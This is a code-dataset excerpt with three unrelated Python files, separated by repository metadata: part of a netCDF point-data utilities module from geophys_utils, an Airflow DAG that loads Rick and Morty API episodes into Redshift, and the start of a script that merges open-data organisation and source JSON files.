kdtree = self.kdtree
distances, indices = kdtree.query(x=np.array(reprojected_coords),
k=points_required,
distance_upper_bound=max_distance)
if max_distance == np.inf:
return distances, indices
else: # Return indices of complete coordinate array, not the spatial subset
return distances, np.where(spatial_mask)[0][indices]
def get_lookup_mask(self,
lookup_value_list,
lookup_variable_name='line',
indexing_variable_name=None,
indexing_dimension='point'
):
'''
Function to return mask array based on lookup variable
'''
if lookup_variable_name:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
if (lookup_variable.shape == ()
or ((len(lookup_variable.shape) == 1) and (lookup_variable.dtype == '|S1'))): # Scalar or string array
dimension = self.netcdf_dataset.get(indexing_dimension)
assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension)
# Repeat boolean value across dimension size
return np.array([lookup_variable[:] in lookup_value_list] * dimension.size)
indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
try:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
except:
raise BaseException('indexing_variable_name not supplied and cannot be inferred')
elif indexing_variable_name:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
if hasattr(indexing_variable, 'lookup'):
# Get lookup variable name from variable attribute
lookup_variable_name = indexing_variable.lookup
elif indexing_variable_name.endswith('_index'):
# Infer lookup variable name from indexing variable name
lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
else:
raise BaseException('lookup_variable_name not supplied and cannot be inferred')
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
else:
raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
# Handle special case for string arrays via OPeNDAP
if self.opendap and (lookup_variable.dtype == 'S1') and (len(lookup_variable.shape) == 2):
# Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP
lookup_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in lookup_variable[:]])
# OPeNDAP will truncate strings to 64 characters - truncate search strings to match
lookup_indices = np.arange(lookup_array.shape[0])[np.in1d(lookup_array, np.array([lookup_value[0:64]
for lookup_value in lookup_value_list]))]
else:
lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], np.array(lookup_value_list))]
logger.debug('lookup_indices: {}'.format(lookup_indices))
lookup_mask = np.in1d(indexing_variable, lookup_indices)
logger.debug('lookup_mask: {}'.format(lookup_mask))
return lookup_mask
#===============================================================================
# def lookup_mask_generator(self,
# lookup_value_list,
# lookup_variable_name='line',
# indexing_variable_name=None
# ):
# '''
# Generator to yield mask array based on lookup variable for each of a list of lookup values
# '''
# if lookup_variable_name:
# indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
#
# try:
# indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
# except:
# raise BaseException('indexing_variable_name not supplied and cannot be inferred')
#
# elif indexing_variable_name:
# indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
#
# if hasattr(indexing_variable, 'lookup'):
# # Get lookup variable name from variable attribute
# lookup_variable_name = indexing_variable.lookup
# elif indexing_variable_name.endswith('_index'):
# # Infer lookup variable name from indexing variable name
# lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
# else:
# raise BaseException('lookup_variable_name not supplied and cannot be inferred')
#
# else:
# raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
#
# lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
#
# for lookup_value in lookup_value_list:
# lookup_indices = np.where(lookup_variable[:] == lookup_value)[0]
# logger.debug('lookup_indices: {}'.format(lookup_indices))
#
# lookup_mask = np.in1d(indexing_variable, lookup_indices)
# logger.debug('lookup_mask: {}'.format(lookup_mask))
# yield lookup_mask
#
#===============================================================================
def get_index_mask(self,
lookup_value_list,
lookup_variable_name='line',
start_index_variable_name=None,
count_variable_name=None,
point_count=None
):
'''
Function to return mask array based on index variable
'''
try:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
except:
raise BaseException('Invalid lookup_variable_name')
start_index_variable_name = start_index_variable_name or lookup_variable_name + '_start_index'
try:
start_index_variable = self.netcdf_dataset.variables[start_index_variable_name]
except:
raise BaseException('start_index_variable_name not supplied and cannot be inferred')
count_variable_name = count_variable_name or lookup_variable_name + '_count'
try:
count_variable = self.netcdf_dataset.variables[count_variable_name]
except:
raise BaseException('count_variable_name not supplied and cannot be inferred')
point_count = point_count or self.netcdf_dataset.dimensions['point'].size
lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], lookup_value_list)]
logger.debug('lookup_indices: {}'.format(lookup_indices))
start_indices = start_index_variable[lookup_indices]
logger.debug('start_indices: {}'.format(start_indices))
counts = count_variable[lookup_indices]
logger.debug('counts: {}'.format(counts))
# Build mask
index_mask = np.zeros(shape=(point_count,), dtype='bool')
for lookup_index in range(len(lookup_indices)):
index_mask[start_indices[lookup_index]:start_indices[lookup_index]+counts[lookup_index]] = True
return index_mask
def expand_lookup_variable(self,
lookup_variable_name='line',
indexing_variable_name=None,
start_index=0,
end_index=0,
mask=None,
indexing_dimension='point'):
'''
Function to expand lookup variables and return an array of the required size
'''
if lookup_variable_name:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
if lookup_variable.shape == (): # Scalar
dimension = self.netcdf_dataset.dimensions.get(indexing_dimension)
assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension)
# Repeat boolean value across dimension size
return np.array([lookup_variable[:]] * dimension.size)
indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
try:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
except:
raise BaseException('indexing_variable_name not supplied and cannot be inferred')
elif indexing_variable_name:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
if hasattr(indexing_variable, 'lookup'):
# Get lookup variable name from variable attribute
lookup_variable_name = indexing_variable.lookup
elif indexing_variable_name.endswith('_index'):
# Infer lookup variable name from indexing variable name
lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
else:
raise BaseException('lookup_variable_name not supplied and cannot be inferred')
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
else:
raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
end_index = end_index or indexing_variable.shape[0] # Usually this will be the point count
index_range = end_index - start_index
if mask is None: # No mask defined - take all points in range
subset_mask = np.ones(shape=(index_range,), dtype='bool')
else:
subset_mask = mask[start_index:end_index]
lookup_variable.set_auto_mask(False)
indexing_variable.set_auto_mask(False)
result_array = lookup_variable[:][indexing_variable[start_index:end_index][subset_mask]] # Need to index numpy array, not netCDF variable
# Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP
if result_array.dtype == 'S1':
result_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in result_array])
return result_array
def chunk_point_data_generator(self,
start_index=0,
end_index=0,
field_list=None,
mask=None,
yield_variable_attributes_first=False):
'''
Generator to optionally yield variable attributes followed by all point data for the specified point index range
Used to retrieve data as chunks for outputting as point-wise lists of lists
@param start_index: start point index of range to read
@param end_index: end point index of range to read. Defaults to number of points
@param field_list: Optional list of field names to read. Default is None for all variables
@param mask: Optional Boolean mask array to subset points
@param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to False
@yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True
@yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point
'''
# Start of point_data_generator function
end_index = end_index or self.point_count
index_range = end_index - start_index
if mask is None: # No mask defined - take all points in range
subset_mask = np.ones(shape=(index_range,), dtype='bool')
else:
subset_mask = mask[start_index:end_index]
index_range = np.count_nonzero(subset_mask)
# If no points to retrieve, don't read anything
if not index_range:
logger.debug('No points to retrieve for point indices {}-{}: All masked out'.format(start_index, end_index-1))
return
# Generate full field list if None provided
if not field_list:
field_list = [variable.name
for variable in self.netcdf_dataset.variables.values()
if (not len(variable.dimensions) # Scalar variable
or variable.dimensions[0] == 'point' # Variable is of point dimension
or (variable.dimensions[0] + '_index' in self.netcdf_dataset.variables.keys() # Variable has an index variable
and len(self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions) # index variable is not a scalar
and self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions[0] == 'point' # index variable is of point dimension
)
)
and not variable.name.endswith('_index')
and not hasattr(variable, 'lookup') # Variable is not an index variable
and not variable.name in NetCDFUtils.CRS_VARIABLE_NAMES
and not re.match('ga_.+_metadata', variable.name) # Not an excluded variable
]
logger.debug('field_list: {}'.format(field_list))
variable_attributes = OrderedDict()
memory_cache = OrderedDict()
for variable_name in field_list:
variable = self.netcdf_dataset.variables.get(variable_name)
if variable is None:
logger.warning('Variable {} does not exist. Skipping.'.format(variable_name))
continue
#logger.debug('variable_name: {}'.format(variable_name))
# Scalar variable
if len(variable.shape) == 0:
# Skip CRS variable
if variable_name in NetCDFUtils.CRS_VARIABLE_NAMES or re.match('ga_.+_metadata', variable_name):
continue
# Repeat scalar value for each point
data_array = variable[:]
memory_cache[variable_name] = np.array([data_array] * index_range)
else: # nD array variable
if (variable.dimensions[0] != 'point'): # Variable is NOT of point dimension - must be lookup
memory_cache[variable_name] = self.expand_lookup_variable(lookup_variable_name=variable_name,
start_index=start_index,
end_index=end_index,
mask=mask)
else: # 'point' is in variable.dimensions - "normal" variable
data_array = variable[start_index:end_index]
# Include fill_values if array is masked
if type(data_array) == np.ma.core.MaskedArray:
data_array = data_array.data
memory_cache[variable_name] = data_array[subset_mask]
if yield_variable_attributes_first:
variable_attributes[variable_name] = dict(variable.__dict__)
logger.debug('variable_attributes: {}'.format(pformat(variable_attributes)))
logger.debug('memory_cache: {}'.format(pformat(memory_cache)))
if yield_variable_attributes_first:
yield variable_attributes
for index in range(index_range):
point_value_list = []
for variable_name, variable in iter(memory_cache.items()):
data_array = variable[index]
# Convert array to string if required
if type(data_array) == np.ndarray and data_array.dtype == object:
data_array = str(data_array)
point_value_list.append(data_array)
yield point_value_list
logger.debug('{} points read for point indices {}-{}'.format(index_range, start_index, end_index-1))
def all_point_data_generator(self,
field_list=None,
mask=None,
read_chunk_size=None,
yield_variable_attributes_first=True):
'''
Generator to yield variable attributes followed by lists of values for all points
@param field_list: Optional list of field names to read. Default is None for all variables
@param mask: Optional Boolean mask array to subset points
@param read_chunk_size: Number of points to read from the netCDF per chunk (for greater efficiency than single point reads)
@param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to True
@yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True
@yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point
'''
read_chunk_size = read_chunk_size or DEFAULT_READ_CHUNK_SIZE
# Process all chunks
point_count = 0
for chunk_index in range(self.point_count // read_chunk_size + 1):
for line in self.chunk_point_data_generator(field_list=field_list,
start_index=chunk_index*read_chunk_size,
end_index=min((chunk_index+1)*read_chunk_size,
self.point_count
),
mask=mask,
yield_variable_attributes_first=yield_variable_attributes_first
):
if not yield_variable_attributes_first:
point_count += 1
yield_variable_attributes_first = False # Only yield variable attributes from the first chunk
#logger.debug('line: {}'.format(line))
yield line
if POINT_LIMIT and (point_count >= POINT_LIMIT):
break
if POINT_LIMIT and (point_count >= POINT_LIMIT):
break
logger.debug('{} points read from netCDF file {}'.format(point_count, self.nc_path))
def get_xy_coord_values(self):
'''
Function to return a full in-memory coordinate array from source dataset
'''
logger.debug('Reading xy coordinates from source dataset')
xycoord_values = np.zeros(shape=(len(self.x_variable), 2), dtype=self.x_variable.dtype)
self.fetch_array(self.x_variable, xycoord_values[:,0])
self.fetch_array(self.y_variable, xycoord_values[:,1])
# Deal with netCDF4 Datasets that have had set_auto_mask(False) called
if hasattr(self.x_variable, '_FillValue'):
xycoord_values[:,0][xycoord_values[:,0] == self.x_variable._FillValue] = np.nan
if hasattr(self.y_variable, '_FillValue'):
xycoord_values[:,1][xycoord_values[:,1] == self.y_variable._FillValue] = np.nan
return xycoord_values
@property
def xycoords(self):
'''
Property getter function to return pointwise array of XY coordinates
The order of priority for retrieval is memory, memcached, disk cache then dataset.
'''
xycoords = None
# assert np.allclose(arr, arr_down)
if self.enable_memory_cache and self._xycoords is not None:
#logger.debug('Returning memory cached coordinates')
return self._xycoords
elif self.memcached_connection is not None:
coord_cache_key = self.cache_basename + '_xycoords'
logger.debug("hit xycoords propery code")
logger.debug(self.memcached_connection)
xycoords = self.memcached_connection.get(coord_cache_key)
if xycoords is not None:
# self.memcached_connection.get(self.cache_path) is True:
logger.debug('memcached key found at {}'.format(coord_cache_key))
#logger.debug('xycoords: {}'.format(xycoords))
else:
xycoords = self.get_xy_coord_values()
logger.debug("key not found at {}. adding key and value".format(coord_cache_key))
self.memcached_connection.add(coord_cache_key, xycoords)
elif self.enable_disk_cache:
if os.path.isfile(self.cache_path):
# Cached coordinate file exists - read it
cache_dataset = netCDF4.Dataset(self.cache_path, 'r')
#assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path)
if 'xycoords' in cache_dataset.variables.keys():
xycoords = cache_dataset.variables['xycoords'][:]
logger.debug('Read {} coordinates from cache file {}'.format(xycoords.shape[0], self.cache_path))
else:
logger.debug('Unable to read xycoords variable from netCDF cache file {}'.format(self.cache_path))
cache_dataset.close()
else:
logger.debug('NetCDF cache file {} does not exist'.format(self.cache_path))
if xycoords is None:
xycoords = self.get_xy_coord_values() # read coords from source file
os.makedirs(os.path.dirname(self.cache_path), exist_ok=True)
if os.path.isfile(self.cache_path):
cache_dataset = netCDF4.Dataset(self.cache_path, 'r+')
else:
cache_dataset = netCDF4.Dataset(self.cache_path, 'w')
if not hasattr(cache_dataset, 'source'):
cache_dataset.source = self.nc_path
#assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path)
if 'point' not in cache_dataset.dimensions.keys():
cache_dataset.createDimension(dimname='point', size=xycoords.shape[0])
if 'xy' not in cache_dataset.dimensions.keys():
cache_dataset.createDimension(dimname='xy', size=xycoords.shape[1])
if 'xycoords' not in cache_dataset.variables.keys():
cache_dataset.createVariable('xycoords',
xycoords.dtype,
dimensions=['point', 'xy'],
**self.CACHE_VARIABLE_PARAMETERS
)
cache_dataset.variables['xycoords'][:] = xycoords # Write coords to cache file
cache_dataset.close()
logger.debug('Saved {} coordinates to cache file {}'.format(xycoords.shape[0], self.cache_path))
else: # No caching - read coords from source file
xycoords = self.get_xy_coord_values()
if self.enable_memory_cache:
self._xycoords = xycoords
return xycoords
@property
def point_variables(self):
'''
Property getter function to return point_variables as required
'''
if not self._point_variables:
logger.debug('Setting point_variables property')
self._point_variables = list([var_name for var_name in self.netcdf_dataset.variables.keys()
if 'point' in self.netcdf_dataset.variables[var_name].dimensions
and var_name not in ['latitude', 'longitude', 'easting', 'northing', 'point', 'fiducial', 'flag_linetype']
])
return self._point_variables
@property
def data_variable_list(self):
'''
Property getter function to return data_variable_list as required
'''
if not self._data_variable_list:
logger.debug('Setting data_variable_list property')
self._data_variable_list = [key for key, value in self.netcdf_dataset.variables.items()
if 'point' in value.dimensions]
return self._data_variable_list
@property
def kdtree(self):
'''
Property getter function to return data_variable_list as required
'''
if not self._kdtree:
logger.debug('Indexing full dataset with {} points into KDTree...'.format(self.xycoords.shape[0]))
self._kdtree = cKDTree(data=self.xycoords, balanced_tree=False)
logger.debug('Finished indexing full dataset into KDTree.')
return self._kdtree
def copy(self,
nc_out_path,
datatype_map_dict={},
variable_options_dict={},
dim_range_dict={},
dim_mask_dict={},
nc_format=None,
limit_dim_size=False,
var_list=[],
empty_var_list=[],
to_crs=None
):
'''
Function to copy a netCDF dataset to another one with potential changes to size, format,
variable creation options and datatypes.
@param nc_out_path: path to netCDF output file
@param to_crs: WKT of destination CRS
'''
if var_list:
expanded_var_list = list(set(
var_list +
NetCDFUtils.X_DIM_VARIABLE_NAMES +
NetCDFUtils.Y_DIM_VARIABLE_NAMES +
NetCDFUtils.CRS_VARIABLE_NAMES +
['line', 'line_index'] # Always include line numbers (This really should be in an overridden function in NetCDFLineUtils)
))
else:
expanded_var_list = var_list
# Call inherited NetCDFUtils method
super().copy(
nc_out_path,
datatype_map_dict=datatype_map_dict,
variable_options_dict=variable_options_dict,
dim_range_dict=dim_range_dict,
dim_mask_dict=dim_mask_dict,
nc_format=nc_format,
limit_dim_size=limit_dim_size,
var_list=expanded_var_list,
empty_var_list=empty_var_list,
)
# Finish up if no reprojection required
dest_srs = get_spatial_ref_from_wkt(to_crs)
if not to_crs or dest_srs.IsSame(get_spatial_ref_from_wkt(self.wkt)):
logger.debug('No reprojection required for dataset {}'.format(nc_out_path))
return
try:
logger.debug('Re-opening new dataset {}'.format(nc_out_path))
new_dataset = netCDF4.Dataset(nc_out_path, 'r+')
new_ncpu = NetCDFPointUtils(new_dataset, debug=self.debug)
logger.debug('Reprojecting {} coordinates in new dataset'.format(len(new_ncpu.x_variable)))
#TODO: Check coordinate variable data type if changing between degrees & metres
new_ncpu._xycoords = transform_coords(new_ncpu.xycoords, self.wkt, to_crs)
new_ncpu.x_variable[:] = new_ncpu._xycoords[:,0]
new_ncpu.y_variable[:] = new_ncpu._xycoords[:,1]
crs_variable_name, crs_variable_attributes = self.get_crs_attributes(to_crs)
logger.debug('Setting {} variable attributes'.format(crs_variable_name))
# Delete existing crs variable attributes
for key in new_ncpu.crs_variable.__dict__.keys():
if not key.startswith('_'):
delattr(new_ncpu.crs_variable, key)
try:
delattr(new_ncpu.x_variable, key)
delattr(new_ncpu.y_variable, key)
except:
pass
# Set new crs variable attributes
new_ncpu.crs_variable.setncatts(crs_variable_attributes)
new_ncpu.x_variable.setncatts(crs_variable_attributes)
new_ncpu.y_variable.setncatts(crs_variable_attributes)
# Rename variables if switching between projected & unprojected
if crs_variable_name != new_ncpu.crs_variable.name:
logger.debug('Renaming {} variable to {}'.format(new_ncpu.crs_variable.name, crs_variable_name))
new_dataset.renameVariable(new_ncpu.crs_variable.name, crs_variable_name)
if crs_variable_name == 'crs': # Geodetic
xy_varnames = ('longitude', 'latitude')
units = dest_srs.GetAngularUnitsName() + 's' # degrees
elif crs_variable_name in ['transverse_mercator', "albers_conical_equal_area"]: # Projected
xy_varnames = ('x', 'y')
units = units = dest_srs.GetLinearUnitsName() + 's' # metres
else:
raise BaseException('Unhandled crs variable name "{}"'.format(crs_variable_name))
logger.debug('Renaming {} & {} variables to {} & {}'.format(new_ncpu.x_variable.name,
new_ncpu.y_variable.name,
*xy_varnames
))
new_dataset.renameVariable(new_ncpu.x_variable.name, xy_varnames[0])
new_ncpu.x_variable.units = units
new_ncpu.x_variable.long_name = xy_varnames[0]
new_dataset.renameVariable(new_ncpu.y_variable.name, xy_varnames[1])
new_ncpu.y_variable.units = units
new_ncpu.y_variable.long_name = xy_varnames[1]
finally:
new_dataset.close()
def set_global_attributes(self, compute_shape=False, clockwise_polygon_orient=False):
'''\
Function to set global geometric metadata attributes in netCDF file
N.B: This will fail if dataset is not writable
'''
try:
metadata_srs = get_spatial_ref_from_wkt(METADATA_CRS)
assert metadata_srs.IsGeographic(), 'Unable to set geodetic parameters for this dataset'
#===================================================================
# # Reopen as writable dataset
# filepath = self.netcdf_dataset.filepath()
# self.netcdf_dataset.close()
# self.netcdf_dataset = netCDF4.Dataset(filepath, 'r+')
#===================================================================
logger.debug('Setting global geometric metadata attributes in netCDF point dataset with {} points'.format(self.netcdf_dataset.dimensions['point'].size))
attribute_dict = dict(zip(['geospatial_lon_min', 'geospatial_lat_min', 'geospatial_lon_max', 'geospatial_lat_max'],
get_reprojected_bounds(self.bounds, self.wkt, METADATA_CRS)
)
)
attribute_dict['geospatial_lon_units'] = 'degree_east'
attribute_dict['geospatial_lat_units'] = 'degree_north'
attribute_dict['geospatial_bounds_crs'] = metadata_srs.ExportToPrettyWkt()
if compute_shape:
try:
logger.debug('Computing concave hull')
attribute_dict['geospatial_bounds'] = shapely.wkt.dumps(
self.get_concave_hull(
to_wkt=METADATA_CRS,
clockwise_polygon_orient=clockwise_polygon_orient
),
rounding_precision=SHAPE_ORDINATE_DECIMAL_PLACES)
except Exception as e:
logger.warning('Unable to compute concave hull shape: {}'.format(e))
try:
self.netcdf_dataset.geospatial_bounds = shapely.wkt.dumps(asPolygon([
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']],
[attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_min']],
[attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_max']],
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_max']],
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']],
]))
except:
pass
logger.debug('attribute_dict = {}'.format(pformat(attribute_dict)))
logger.debug('Writing global attributes to netCDF file'.format(self.netcdf_dataset.filepath()))
for key, value in attribute_dict.items():
setattr(self.netcdf_dataset, key, value)
logger.debug('Finished setting global geometric metadata attributes in netCDF point dataset')
except:
logger.error('Unable to set geometric metadata attributes in netCDF point dataset')
raise
def set_variable_actual_range_attribute(self):
'''\
Function to set ACDD actual_range attribute in all non-index point-dimensioned variables
N.B: Will fail if dataset is not writable
'''
self.netcdf_dataset.set_auto_mask(True)
try:
for variable_name, variable in self.netcdf_dataset.variables.items():
# Skip all variables not of point dimensionality
if 'point' not in variable.dimensions:
continue
# Skip index variables
if re.search('_index$', variable_name):
continue
try:
variable.actual_range = np.array(
[np.nanmin(variable[:]), np.nanmax(variable[:])], dtype=variable.dtype)
logger.debug('{}.actual_range = {}'.format(variable_name, variable.actual_range))
except:
logger.warning('Unable to compute actual_range value for point variable {}'.format(variable_name))
except:
logger.error('Unable to set variable actual_range metadata attributes in netCDF point dataset')
raise
def main(debug=True):
'''
Main function for quick and dirty testing
'''
netcdf_path = sys.argv[1]
netcdf_dataset = netCDF4.Dataset(netcdf_path, 'r')
ncpu = NetCDFPointUtils(netcdf_dataset, debug=debug) # Enable debug output here
# Create mask for last ten points
mask = np.zeros(shape=(ncpu.point_count,), dtype='bool')
mask[-10:] = True
# Set list of fields to read
field_list = None
#field_list = ['latitude', 'longitude', 'obsno', 'reliab']
point_data_generator = ncpu.all_point_data_generator(field_list, mask)
# Retrieve point variable attributes first
variable_attributes = next(point_data_generator)
logger.info('variable_attributes: {}'.format(variable_attributes))
# Use long names instead of variable names where they exist
field_names = [variable_attributes[variable_name].get('long_name') or variable_name
for variable_name in variable_attributes.keys()]
logger.info('field_names: {}'.format(field_names))
for point_data in point_data_generator:
#logger.debug('point_data: {}'.format(pformat(point_data)))
result_dict = dict(zip(field_names, point_data))
logger.info('result_dict: {}'.format(result_dict))
if __name__ == '__main__':
# Setup logging handlers if required
console_handler = logging.StreamHandler(sys.stdout)
#console_handler.setLevel(logging.INFO)
console_handler.setLevel(logging.DEBUG)
console_formatter = logging.Formatter('%(message)s')
console_handler.setFormatter(console_formatter)
if not logger.handlers:
# Set handler for root logger to standard output
logger.addHandler(console_handler)
logger.debug('Logging handlers set up for logger {}'.format(logger.name))
ncu_logger = logging.getLogger('geophys_utils._netcdf_utils')
if not ncu_logger.handlers:
ncu_logger.addHandler(console_handler)
logger.debug('Logging handlers set up for {}'.format(ncu_logger.name))
main()
|
GeoscienceAustralia/geophys_utils
|
geophys_utils/_netcdf_point_utils.py
|
_netcdf_point_utils.py
|
py
| 66,225 |
python
|
en
|
code
| 22 |
github-code
|
6
|
31106779539
|
from datetime import datetime
import requests
import pandas as pd
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.postgres_operator import PostgresOperator
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extras import execute_values
import time
default_args = {
'owner': 'JORGE',
'start_date': datetime(2023, 5, 18),
'schedule_interval': '0 0 * * *',
}
def obtener_datos():
url = 'https://rickandmortyapi.com/api/episode'
datos_obtenidos = []
while url is not None:
response = requests.get(url)
data = response.json()
datos_obtenidos += data['results']
url = data['info']['next']
df_episodios = pd.DataFrame(datos_obtenidos)
df_episodios.to_dict('records')
df_episodios = df_episodios.drop(columns=['characters','url'])
df_episodios.columns = ["id","nombre_episodio", "fecha_aire", "episodio","fecha_creacion"]
hook = PostgresHook(postgres_conn_id='amazon_redshift')
conn = hook.get_conn()
cur = conn.cursor()
tabla = "episodio"
columns = ['id', 'nombre_episodio', 'fecha_aire', 'episodio', 'fecha_creacion']
values = [tuple(x) for x in df_episodios.to_numpy()]
insert_sql = f"INSERT INTO {tabla} ({', '.join(columns)}) VALUES %s"
cur.execute("BEGIN")
execute_values(cur, insert_sql, values)
conn.commit()
cur.close()
conn.close()
with DAG(
default_args=default_args,
dag_id='carga_de_episodios',
description='Obtener datos de API, transformar y cargar en Redshift',
) as dag:
crear_tabla = PostgresOperator(
task_id='crear_tabla_episodio',
postgres_conn_id='amazon_redshift',
sql="""
DROP TABLE IF EXISTS jorgeflores2311233_coderhouse.episodio;
CREATE TABLE jorgeflores2311233_coderhouse.episodio(
id INTEGER PRIMARY KEY,
nombre_episodio VARCHAR(250),
fecha_aire VARCHAR(250),
episodio VARCHAR(250),
fecha_creacion DATETIME
);
"""
)
obtener_datos_episodios = PythonOperator(
task_id='obtener_datos',
python_callable=obtener_datos
)
crear_tabla >> obtener_datos_episodios
|
jorge-flores-py/rick-morty
|
dags/dag_carga_automatica_episodios.py
|
dag_carga_automatica_episodios.py
|
py
| 2,329 |
python
|
es
|
code
| 0 |
github-code
|
6
|
72052702908
|
#!/usr/bin/env python
# coding: utf-8
""" This script collects all the data in orgs and sources folders and merge them in a single json file. """
import json, pathlib, os, sys
### ENVIRONMENTAL VARIABLES
# environmental variables can be set in order to override default values
# NOTE: you can use relative or absolute paths, with or without a separator at the end of folder names
# the folder that contains sources json files
# default: './sources'
env_sources = 'OPENDATA_SOURCES_DIR'
# the folder containing the organization details
# default: './orgs'
env_organizations = 'OPENDATA_ORGANIZATIONS_DIR'
# the filename that will store all results (include extension)
# default: './dist/index.json'
env_dist_filename = 'OPENDATA_DIST_FILENAME'
# the filename that will store nested results (include extension)
# default: './dist/nested/index.json'
env_nested_filename = 'OPENDATA_NESTED_FILENAME'
# shall the script override the data?
# default: True
env_allow_override = 'OPENDATA_CAN_OVERRIDE'
# It may be desiderable to remove the owner_org key from the source since it is implicit.
# This saves a few bytes in the final json file. If you want to keep the owner_org key
# feel free to set the variable to True
# default: False
env_keep_owner = 'OPENDATA_KEEP_OWNER'
# in case you want just to output to the console (i.e. if you want to pipe the results into a parser)
# default: False
env_to_stdout = 'OPENDATA_USE_STDOUT'
### DEFAULT SETTINGS
falsy_strings = ('no', 'false', 'never', 'n', 'f', 'falso', 'mai') # add other strings if necessary (?)
empty = ('', None)
sources_dir = os.environ[env_sources] if (env_sources in os.environ) and (os.environ[env_sources] not in empty) else pathlib.Path('.', 'sources')
orgs_dir = os.environ[env_organizations] if (env_organizations in os.environ) and (os.environ[env_organizations] not in empty) else pathlib.Path('.', 'orgs')
dist_filename = os.environ[env_dist_filename] if (env_dist_filename in os.environ) and (os.environ[env_dist_filename] not in empty) else pathlib.Path('.', 'dist/index.json')
nested_filename = os.environ[env_nested_filename] if (env_nested_filename in os.environ) and (os.environ[env_nested_filename] not in empty) else pathlib.Path('.', 'dist/nested/index.json')
override = (os.environ[env_allow_override].lower() not in falsy_strings) if (env_allow_override in os.environ) and (os.environ[env_allow_override] not in empty) else True
keep_owner = (os.environ[env_keep_owner].lower() not in falsy_strings) if (env_keep_owner in os.environ) and (os.environ[env_keep_owner] not in empty) else False
to_stdout = (os.environ[env_to_stdout].lower() not in falsy_strings) if (env_to_stdout in os.environ) and (os.environ[env_to_stdout] not in empty) else False
# A dictionary to guide in the classification of the organizations.
# There are two main branches, "nazionale" (national) and "locale" (local).
# Every branch has a inner dictionary. The inner dictionary keys are the first word in org.title whereas
# the dictionary values are the keys to be used to identify the type of organization in json output.
# You can customize the values returned; the key "*" is used as a catch-all alternative if the first word
# in org.title is not present in the dictionary's branch.
classification = {
'nazionale': {
'ministero': 'ministero',
'*': 'altro'
},
'locale': {
'citta': 'citta metropolitana',
'comune': 'comune',
'provincia': 'provincia',
'regione': 'regione',
'universita': 'universita',
'*': 'altro'
}
}
### UTILITIES
def classify(organization):
"""
the function checks the first word in the title of the organization
and returns a list of keys to be used to classify it.
"""
first_word = organization['name'].split('-')[0]
category = 'locale' if 'region' in organization.keys() else 'nazionale'
result = [category]
if category == 'locale':
result.append(organization['region'])
if first_word in classification[category].keys():
result.append(classification[category][first_word])
else:
result.append(classification[category]['*']) # first word not recognized.
return result
def populate_dict(keys_list, dictionary, organization, source):
"""
recursive function that takes a list of keys to be added to a dict of dicts (the dictionary argument).
If the list is empty, it returns the organization argument (the leaf) otherwise it returns a dictionary
created from the nested keys (the branches).
example:
--------
keys_list = ['a', 'b', 'c']
dictionary = {'other':{'nested'}, 'a':{'foo':'bar'}}
organization = {"whatever": "value", "you":"want"}
> populate_dict(keys_list, dictionary, organization)
> {'other':{'nested'}, 'a':{'foo':'bar', 'b':{'c':{"whatever": "value", "you":"want"}}}}
"""
if len(keys_list) == 0:
# time to save the new source
has_organization = False
if not keep_owner:
source.pop('owner_org', None)
# check if organization is already present
for org in dictionary:
if org['name'] == organization['name']:
# the organization already esists
organization = org
# if the organization is already in the dictionary the 'sources' key has been set
# so it is not necessary to check for its existence
organization['sources'].append(source)
has_organization = True
break
if not has_organization:
# no organization found or dictionary is empty
organization['sources'] = [source]
dictionary.append(organization)
return dictionary
key = keys_list.pop(0)
if key not in dictionary.keys():
if len(keys_list) == 0:
dictionary[key] = populate_dict(keys_list, [], organization, source)
else:
dictionary[key] = populate_dict(keys_list, {}, organization, source)
else:
dictionary[key] = populate_dict(keys_list, dictionary[key], organization, source)
return dictionary
### PARSER
def parse():
"""
the main script
"""
